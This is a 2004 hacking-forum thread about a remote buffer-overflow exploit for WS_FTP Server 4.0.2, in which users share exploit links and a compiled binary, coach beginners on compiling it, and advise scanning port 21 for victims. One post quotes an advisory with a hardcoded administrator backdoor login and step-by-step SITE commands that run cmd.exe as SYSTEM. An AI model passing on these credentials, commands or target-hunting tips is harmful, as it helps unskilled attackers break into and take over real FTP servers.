Gurou
WS_FTP Server <= 4.0.2 ALLO Remote overflow Exploit

http://www.k-otik.com/exploits/03.23.xp_ws...server2.cpp.php

another WS_FTP Server vulnerability!!
Sp00ky
hey nicely found there m8 great job
but is there someone who can compile it?
i can't cause i am still learning how to compile stuff
Niekos
QUOTE (Sp00ky @ Mar 23 2004, 07:37 PM)
hey nicely found there m8 great job
but is there someone who can compile it?
i can't cause i am still learning how to compile stuff

Compiling isn't that difficult, man. Plz learn that first before you're gonna use all those exploits. Just download vc++ and lcc and use KNOPPIX for the linux exploits. It's very easy.
aapje
thanks for the link man
Sp00ky
yeah niekos i know but i started learning yesterday and i am downloading knoppix as we speak
so i'm srry if i offended you or something :$ was not my intention i am just here to learn
aapje
QUOTE (Sp00ky @ Mar 23 2004, 08:21 PM)
yeah niekos i know but i started learning yesterday and i am downloading knoppix as we speak
so i'm srry if i offended you or something :$ was not my intention i am just here to learn

we all gotta learn, you can try to download linux, easy ones like lindows... with that you can compile your linux exploits, and for cpp etc you must download vb c++
axelfoley643
QUOTE (aapje @ Mar 23 2004, 08:34 PM)
QUOTE (Sp00ky @ Mar 23 2004, 08:21 PM)
yeah niekos i know but i started learning yesterday and i am downloading knoppix as we speak
so i'm srry if i offended you or something :$ was not my intention i am just here to learn

we all gotta learn, you can try to download linux, easy ones like lindows... with that you can compile your linux exploits, and for cpp etc you must download vb c++

Can you tell me what I can do when I have errors?
blahplok
with lss i can compile this source, too much error...
T3cHn0b0y
So soon!? I'm gonna check the source...
ganz2
too bad nobody hardly uses ws_ftp but nice indeed
mysoulmustfly
could you please compile it for me
thx a lot.
AsuKa
Compiled fine in Visual Studio, I've uploaded the file and here is the link.

wsftp exploit
jtevermore
i appreciate that asuka.
i use gcc in windows to compile my exploits, and i have a good knowledge of c & cpp, but the gcc cpp compiler is a bit bitchy.

lol
FuzZyBeeR
Thanx for sharing this sploit. Never know when you come across someone that uses wsftp server
FloW
AsuKa

That's the old one you are sharing...
AsuKa
I compiled it from the source that was posted "WS_FTP Server <= 4.0.2 ALLO Remote buffer overflow Exploit", so I don't think it's the old one.

Edit: Doh, I uploaded the wrong one.
I've replaced it with the current version, so anyone who d/l'd before,
make sure to grab it again.
Sp00ky
hey thanks a lot for this tool man but i have 1 question: how do i use it? cause i don't understand the commandline (srry just learning everything i can, i am new :$ so srry if it's a stupid question)
Gurou
thanks for the .exe
OldSkool
thx for the exploit. can be useful.
DME
I get many errors compiling over cygwin. So I have to use it under linux ;( ... But okay
brOmstar
this one should be hard to use cause

* NOTE:
* - The exploit assumes the user has a total file size limit. If the user only has
* a max number of files limit you will need to rewrite parts of this exploit for
* it to work.

if no limit was set then the exploit is worthless...

FloW
thnx dude
azerty
nice work but what port do we need 2 scan ?
XpProf
QUOTE (azerty @ Mar 24 2004, 05:56 PM)
nice work but what port do we need 2 scan ?

You need to scan tcp 21. It's the standard ftp port. Then, if you find any server which uses wsftp, you can try the exploit.

Good Luck

Many Thx AsuKa

Xp
shaun2k2
Sp00ky, read my sticky at the top of the forum. "Learning to compile" shouldn't take more than 5 minutes. If you want to be a 'hacker', you should learn to code, not learn to compile sploits
We wouldn't have half as many problems if people could just take the code "as is", and do whatever is necessary to get the code working. I think those requesting compiles should come to earth - if you can't even compile the exploit, why on earth are you trying to own somebody with it? You'd be surprised how much info systems log about you - if you did manage to get it, there'd be more than enough info to place your ass in a jail cell for a few months. Do you agree?

QUOTE
nice work but what port do we need 2 scan ?

Write a perl or expect script to connect to a range of IP addresses on tcp port 21, and compare the given banner with the default banner of ws_ftp.


-Shaun.
FloW
So you just scan port 21.. But how u get username and pass then ??
(u have 2 give in the exploit) ?

cheers FloW
clip
QUOTE (FloW @ Mar 24 2004, 07:20 PM)
So you just scan port 21.. But how u get username and pass then ??
(u have 2 give in the exploit) ?

cheers FloW

hehehehe
qcred11
By the way, a new STAT command overflow exploit for WS_FTP Server <= 4.0.2 just came out. If you guys are interested, here is the link:
http://www.security.nnov.ru/files/xp_ws_ftp_server.zip

Did you hear about backdoor in this ftp server?
I got some info about it. Sounds like very useful information:
"Description
~~~~~~~~~~~
Any local user or any remote user who can execute programs on the FTP server
as any user can start programs on the FTP server with the SYSTEM privilege.

Details
~~~~~~~
There are two WS_FTP Server options only the FTP system administrator can
change. When enabled a FTP system administrator can edit user-defined SITE
FTP commands. These user-defined SITE commands execute a program of the FTP
system admin's choice. To protect the FTP sites, these options can only be
controlled by a local FTP system administrator using the iftpmgr.exe
program. It's not possible for a remote FTP system admin to enable these
options through the iftpmgr.exe program. However, it's possible for a FTP
system administrator to enable these options with a special WS_FTP Server
SITE command. Ipswitch forgot to mask out the bits that enable these options
before saving the new Flags when it receives a new SITE SETS (Set Site
Options) command from a remote FTP system administrator.

A "remote" FTP system admin is any FTP system admin using FTP/TELNET to
connect to the server, which includes local users. If the remote user
doesn't have the FTP system admin password but can run a program on the FTP
server as any user, or if the user is a local user, the user can log in as
the FTP system administrator by using a backdoor.

FTP System Administrator backdoor: Any local user, or any remote user who
can run programs on the FTP server as any user, can log in as the FTP System
Administrator by using a backdoor.

RealName: Local Session Manager
Username: XXSESS_MGRYY
Password: X#1833

The user must have an IP equal to 127.0.0.1 and must connect to server IP
127.0.0.1 or the login will fail.

Exploit
~~~~~~~
Use telnet/ftp to log in as the FTP system admin or use the backdoor. Enable
remote editing of SITE cmds/events (exec files). This is off by default, but
can be enabled by a remote ftp admin. First use the SITE List Site Options
command:

SITE LSTC
220
C:\iFtpSvc<\t>C:\iFtpSvc<\t>C:\iFtpSvc\Logs<\t>21<\t>0<\t>1460<\t>0<\t>16384<\t>C:\iFtpSvc\Security<\t>0

<\t> means tab, or byte 0x09.

Write down the 2nd to 8th site options you find there. Change the 5th Flags
option by OR'ing it with 0x180. Now put the 2nd to 8th options on the next
line, each option separated by a tab, except for the first option right
after "SITE SETS" which should have a space just before it:

SITE SETS C:\iFtpSvc<\t>C:\iFtpSvc\Logs<\t>21<\t>384<\t>1460<\t>0<\t>16384
220 options set

Now iftpmgr.exe can be used to remotely control all site options. I'll show
how to manually add a SITE cmd we can use without using iftpmgr.exe. The
command to do that is:

SITE SETC <HostName><\t>3V1L<\t>cmd.exe<\t>/C echo yup<\t>16
220 site command modified

<HostName> is the first name displayed before you log in to the FTP. 3V1L is
the name of the new SITE command. Flags = 16 means write output to the
screen.

SITE 3V1L
200-Command Started
200-yup
200 SITE command execution successful
"

Action
what is the exact banner name of ws_ftp server? is it ws_ftp?
mysoulmustfly
thx qcred11
RizL4
i have found some servers with this version but i don't understand the commands

can someone explain to me why u have to put in username and pass?

and what is sip and sport???

thanks
Invision Power Board © 2001-2005 Invision Power Services, Inc.